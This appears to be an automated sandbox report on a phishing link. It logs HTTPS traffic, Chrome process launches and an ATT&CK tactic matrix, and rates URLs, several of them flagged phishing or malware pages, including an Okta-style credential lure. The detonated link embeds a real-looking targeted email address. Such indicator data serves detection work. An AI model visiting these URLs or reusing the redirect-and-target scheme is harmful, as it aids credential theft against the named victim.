            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49722 version: TLS 1.2
            Source: classification engineClassification label: mal96.phis.win@20/103@56/28
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2312,i,3901207920137646878,15146386042684683243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw=="
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 --field-trial-handle=2312,i,3901207920137646878,15146386042684683243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder
            1
            Registry Run Keys / Startup Folder
            1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/mithunaads.in/M%2f45043%2FaGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://developers.google.com/recaptcha/docs/faq#localhost_support0%URL Reputationsafe
            https://www.gstatic.c..?/recaptcha/releases/EGbODne6buzpTnWrrBprcfAY/recaptcha__.0%URL Reputationsafe
            https://support.google.com/recaptcha#62627360%URL Reputationsafe
            https://support.google.com/recaptcha/?hl=en#62238280%URL Reputationsafe
            https://cloud.google.com/contact0%URL Reputationsafe
            http://mithunaads.in/favicon.ico0%Avira URL Cloudsafe
            https://support.google.com/recaptcha/#61759710%URL Reputationsafe
            https://saj.mordantif.com/56RePLZ7UZmHT23036MEuv60100%Avira URL Cloudphishing
            https://saj.mordantif.com/uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257100%Avira URL Cloudphishing
            https://saj.mordantif.com/ijWVcwkWzgZ9NJntUuz6LBrGkpnmKnWNecHtytLgqr5ZMKNDQLD2TVkGk13JNueykxab223100%Avira URL Cloudphishing
            https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t70%Avira URL Cloudsafe
            https://support.google.com/recaptcha0%URL Reputationsafe
            https://cloud.google.com/recaptcha-enterprise/billing-information0%URL Reputationsafe
            https://recaptcha.net0%URL Reputationsafe
            https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que0%URL Reputationsafe
            https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca0%URL Reputationsafe
            https://saj.mordantif.com/efAS8MaAYyPMJzZJXh3iwSLoSvYijLRXKbOYqfZGglBeiNuIf90150100%Avira URL Cloudphishing
            https://code.jquery.com/jquery-3.6.0.min.js0%Avira URL Cloudsafe
            https://a.nel.cloudflare.com/report/v4?s=zHmaNT1qx8G57SnTYFFYFSsgpZAdHZ9PysUswhbqmfcChtngJvyJ%2BJ4c1K7h0YdyL4sDDjIaieIP%2BW9%2FGPlBJT5uYwJWpq6dKiZxOQAzQaR5Jv%2FDmdXlPOTmnfJDhA%3D%3D0%Avira URL Cloudsafe
            https://code.jquery.com/jquery-3.6.0.min.js1%VirustotalBrowse
            https://saj.mordantif.com/rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200100%Avira URL Cloudphishing
            https://saj.mordantif.com/34PjDiabG2bEMu6719100%Avira URL Cloudphishing
            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css0%Avira URL Cloudsafe
            https://saj.mordantif.com/ijwV7YtuMF8FjspkoicNvuuHzs5psb4Z1qUG03wx2ZMyqtXHsmhPOuc78161100%Avira URL Cloudphishing
            https://a.nel.cloudflare.com/report/v4?s=oviTCtqZU1SvWh4Rb9n%2FdQhcqKkeIvf2bmDzToJChqBCMNP3uf8Lqv5FgwTCZfVju99wZWAt1%2F9Q0s%2Bke04dlTbPX8gsxFecebo7gI5ObjkBErCP8HtQP0qiDOy%2Fhw%3D%3D0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be0%Avira URL Cloudsafe
            https://github.com/fent)0%Avira URL Cloudsafe
            https://saj.mordantif.com/45itnDnlBkLf89wB5guMvj2hxy65100%Avira URL Cloudphishing
            https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t70%VirustotalBrowse
            https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js0%Avira URL Cloudsafe
            https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css0%VirustotalBrowse
            https://saj.mordantif.com/12KYWgiq1CIPJtcA56dot1AeMqr50100%Avira URL Cloudphishing
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js0%VirustotalBrowse
            https://saj.mordantif.com/q8Yr/100%Avira URL Cloudphishing
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8c285aefbf971821/1726232795433/5XXXqDfOKsEgfK_0%Avira URL Cloudsafe
            https://fipyf.orpkf.ru/mcrnzgbukewizymfphpkvhpbdNTtqWTUKJKTWGNEVFPTXALIOMOEGHBDCPCMKMAPGJRGAJFMEAETHXYQQADDRrsZugH7WwfW12wPwx400%Avira URL Cloudsafe
            https://saj.mordantif.com/qrzQaQ92ePEnjRgmrblnV721RttaWBghmDscAvjTLQ9Ke145140100%Avira URL Cloudphishing
            https://www.google.com/recaptcha/api2/0%Avira URL Cloudsafe
            https://www.google.com/amp/mithunaads.in/M/45043/aGFucy5hbmRlcnNvbkBhZy5zdGF0ZS5tbi51cw==0%Avira URL Cloudsafe
            https://www.google.com/recaptcha/api.js0%VirustotalBrowse
            https://saj.mordantif.com/90cIpGfk2aMerArq2KIwyO12gL058Oayz79100%Avira URL Cloudphishing
            https://saj.mordantif.com/ypEsiIUl5CT4iuptTEAbaxVXn8Z2jjwd4LQaqtbwZaSDIcVcq100%Avira URL Cloudphishing
            https://www.google.com/recaptcha/api2/0%VirustotalBrowse
            https://saj.mordantif.com/347NbeCqp7yhC2mh5YXxi0qmbVijg5xGNhvJ1y5kE67110100%Avira URL Cloudphishing
            https://saj.mordantif.com/wxRCHYcYMSy7uIxqz8ascnfIbk1eWKPIERYPmnT2zBHeGE4bZr34fnKXaSkjQEjab172100%Avira URL Cloudphishing
            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%Avira URL Cloudsafe
            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/0%Avira URL Cloudsafe
            https://saj.mordantif.com/ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210100%Avira URL Cloudphishing
            https://saj.mordantif.com/q8Yr/?ILhans.anderson@ag.state.mn.us100%Avira URL Cloudphishing
            https://saj.mordantif.com/qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232100%Avira URL Cloudphishing
            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%VirustotalBrowse
            https://saj.mordantif.com/pq4G6HI3Ijg6dT2j1yzOjuv38100%Avira URL Cloudphishing
            https://play.google.com/log?format=json&hasfast=true0%Avira URL Cloudsafe
            https://saj.mordantif.com/favicon.ico100%Avira URL Cloudphishing
            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css0%VirustotalBrowse
            https://cdn.socket.io/4.6.0/socket.io.min.js0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8c285aefbf971821&lang=auto0%Avira URL Cloudsafe
            https://saj.mordantif.com/jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk100%Avira URL Cloudphishing
            https://play.google.com/log?format=json&hasfast=true0%VirustotalBrowse
            https://saj.mordantif.com/uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130100%Avira URL Cloudphishing
            https://saj.mordantif.com/cdwMHwMulA2IdrzZU0QtBhWShA342kvmGDEeGbEkl100100%Avira URL Cloudphishing
            https://cdn.socket.io/4.6.0/socket.io.min.js0%VirustotalBrowse
            https://saj.mordantif.com/abPT4sUgOrsEgh28100%Avira URL Cloudphishing
            https://hyu.prosolmi.su/303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV100%Avira URL Cloudmalware
            https://get.geojs.io/v1/ip/geo.json0%Avira URL Cloudsafe
            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8c285aefbf971821/1726232795430/35d15596e15914e0c91615707e683afd29cca0ae83719ab89b59c4812845ce0c/F9IyQelDIMunbIF0%Avira URL Cloudsafe
            https://saj.mordantif.com/kl1XjPKHnGhRdwLFWhMa3e96JMl95nsR8rSBiwellijqABwBMDvlTUNJo62aBcHTGWwx220100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              unknown
